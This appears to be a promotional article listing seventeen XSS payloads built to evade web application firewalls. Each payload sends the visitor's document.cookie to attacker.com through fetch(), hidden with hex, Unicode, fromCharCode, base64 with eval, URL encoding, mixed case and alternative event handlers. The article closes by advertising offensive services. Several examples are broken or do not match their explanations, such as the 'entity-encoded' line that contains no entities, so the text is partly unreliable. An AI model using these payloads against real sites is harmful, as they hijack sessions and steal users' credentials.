Mastering XSS: Advanced Techniques to Bypass Web Application Firewalls (WAF)
Bypassing a Web Application Firewall (WAF) for an XSS (Cross-Site Scripting) attack often involves obfuscating or encoding the payload to slip past the filtering mechanisms. Here’s an example of an XSS payload that uses common WAF bypass techniques, including character encoding, manipulation of tags, and creative ways to inject payloads that get past WAFs.
XSS Payload Example:
<svg/onload='fetch(`//attacker.com?cookie=`+document.cookie)'>
However, to make this more likely to bypass WAFs, we’ll introduce several encoding, obfuscation, and technique adjustments:
1. Hexadecimal encoding of characters:
Some WAFs do not properly decode hex-encoded characters, which allows us to sneak the payload past the filters:
<svg/onload=\u0066\u0065\u0074\u0063\u0068(`//attacker.com?cookie=`+document.cookie)>
2. Broken up tags and attributes:
Breaking up the attributes, as WAFs often expect full or predictable patterns:
<svG/oNloAd=fetCh(`//attacker.com?cookie=`+dOcument.cookie)>
Notice the mixed case of tags and attributes, which may not be caught by simple WAF filtering.
3. Polyglot XSS (Combining multiple techniques):
A polyglot payload is designed to run regardless of whether it’s inside HTML, a script tag, or an attribute. Here's a simple polyglot example:
"><sVg/onload=fetch(`//attacker.com?cookie=`+document.cookie)>
This payload will work if injected in an HTML tag and will trigger when the tag is rendered.
4. JavaScript Function Shortcuts and Evasion:
Obfuscating JavaScript code can often confuse simple pattern-matching WAFs. Here’s an example:
<svg onload=String.fromCharCode(102,101,116,99,104)('//attacker.com?cookie='+document.cookie)>
This payload converts the fetch function into its character code equivalent (fromCharCode), making it harder for WAFs to detect and block.
5. URL-encoding or base64 encoding the payload:
Some WAFs don’t properly decode or parse encoded payloads. You can URL-encode the payload, for example:
%3Csvg%20onload%3Dfetch%28%60%2F%2Fattacker.com%3Fcookie%3D%60%2Bdocument.cookie%29%3E
Alternatively, you can Base64 encode the JavaScript and decode it in the browser:
<svg/onload="eval(atob('ZmV0Y2goJy8vYXR0YWNrZXIuY29tP2Nvb2tpZT0nK2RvY3VtZW50LmNvb2tpZSk='))">
These techniques are more advanced and may evade a variety of common filtering mechanisms:
6. HTML Entity Encoding:
Some WAFs might not properly decode HTML entities, allowing you to encode special characters like <, >, " or ' to slip through.
For example, encode special characters using HTML entities:
<svg/onload=fetch(`//attacker.com?cookie=`+document.cookie)>
This encodes fetch as fetch.
7. Concatenation Using String Methods:
Another bypass technique involves breaking the payload into smaller pieces and using JavaScript functions like .concat() to rebuild the payload.
<svg onload=('f'+'et'+'ch')(`//attacker.com?cookie=`+document.cookie)>
This dynamically concatenates the fetch function to avoid detection.
8. Unicode Character Escaping:
Some WAFs do not properly decode Unicode escape sequences. You can bypass the filter by encoding parts of your payload as Unicode.
For example, you could encode fetch as follows:
<svg onload="\u0066\u0065\u0074\u0063\u0068(`//attacker.com?cookie=`+document.cookie)">
This encodes fetch as Unicode escape sequences.
9. Using Event Handlers in Alternative HTML Tags:
Most WAFs focus on certain tags like <script>, but there are many HTML elements with event handlers that can be abused, such as <img>, <div>, or even <input>.
For example, instead of using <svg>, you can try:
领英推荐
<input type="text" autofocus onfocus=fetch(`//attacker.com?cookie=`+document.cookie)>
The autofocus attribute ensures that the payload is executed as soon as the page loads.
10. Bypass Using No-Space or Minimal-Space Techniques:
Some WAFs filter based on spaces, assuming the structure of the tag requires spaces between attributes and tags. This can be bypassed by omitting or minimizing spaces.
For example:
<svg/onload=fetch(`//attacker.com?cookie=`+document.cookie)>
Or you could replace spaces with newlines or other whitespace characters that are harder for WAFs to catch:
<svg
onload =
fetch(`//attacker.com?cookie=`+document.cookie)>
11. Using Double Encodings:
You can try using double URL encoding or double escaping to confuse the WAF into missing your payload.
For example, the < character can be double URL-encoded as %253C, and > as %253E, so a basic XSS payload might become:
%253Csvg%2520onload%253Dfetch%2528%2560%252F%252Fattacker.com%253Fcookie%253D%2560%252Bdocument.cookie%2529%253E
12. Using Mixed Quotes and Encodings:
By mixing single and double quotes and using encodings for critical characters, you can bypass simple filters that assume a predictable structure.
For example:
<svg onload="f'e't'ch(`//attacker.com?cookie=`+document.cookie)">
This uses mixed single and double quotes around the fetch function, which may bypass some WAFs.
13. Nested Tags (DOM Climbing):
You can sometimes bypass WAFs by nesting tags and placing the malicious payload within an inner tag that the WAF doesn’t expect.
For example:
<svg><g/onload=fetch(`//attacker.com?cookie=`+document.cookie)></g></svg>
This nests the payload inside a <g> tag, which is a child of <svg>.
14. JavaScript Escapes with eval():
Although many WAFs block the use of eval(), using a combination of obfuscation and JavaScript escapes can sometimes slip through:
<svg/onload=eval(String.fromCharCode(102,101,116,99,104)+`('https://attacker.com?cookie='+document.cookie)`);>
This breaks down the eval() function and dynamically creates the fetch call using String.fromCharCode().
15. Exploiting Uncommon HTML5 Event Handlers:
HTML5 introduced several new event handlers that are less commonly monitored by WAFs. These handlers include onmouseenter, onmouseleave, oninput, and others.
For example:
<div onmouseenter=fetch(`//attacker.com?cookie=`+document.cookie)>
This payload triggers the XSS when the user moves the mouse pointer over the <div> element.
16. Exploiting URL Protocols:
Some WAFs may not properly sanitize certain URL protocols like javascript:, allowing you to inject malicious JavaScript directly into links.
For example, instead of relying on a tag with onload, you could use:
<a href="javascript:fetch(`//attacker.com?cookie=`+document.cookie)">Click me</a>
If the WAF does not filter javascript: URLs, this can be effective.
17. DOM-based XSS (Client-Side Bypass):
Some WAFs only monitor server-side inputs, so if the application uses client-side JavaScript that directly interacts with the DOM, you can bypass WAFs by injecting malicious scripts that manipulate the DOM dynamically.
Example:
<script>document.write('<img src=x onerror="fetch(`//attacker.com?cookie=`+document.cookie)">');</script>
This manipulates the DOM directly after the page loads, bypassing many server-side filters.
In conclusion, understanding and applying advanced XSS techniques to bypass WAFs is crucial for penetration testers and security researchers who aim to stay ahead of evolving defenses. As attackers continually develop new methods to exploit web vulnerabilities, it's essential to enhance your skills and keep up with the latest in web application security. For those looking to dive deeper into offensive security techniques, Sysbraykr offers tailored cybersecurity services, including Hacking as a Service, staffing, SOC solutions, and private training. Explore more at [Sysbraykr.com](https://sysbraykr.com) and take your skills to the next level with immersive, hands-on training at [Hackerkamp150](https://hackerkamp150.com). Whether you're preparing for red teaming or advanced threat simulations, these resources will equip you with the expertise to tackle real-world challenges.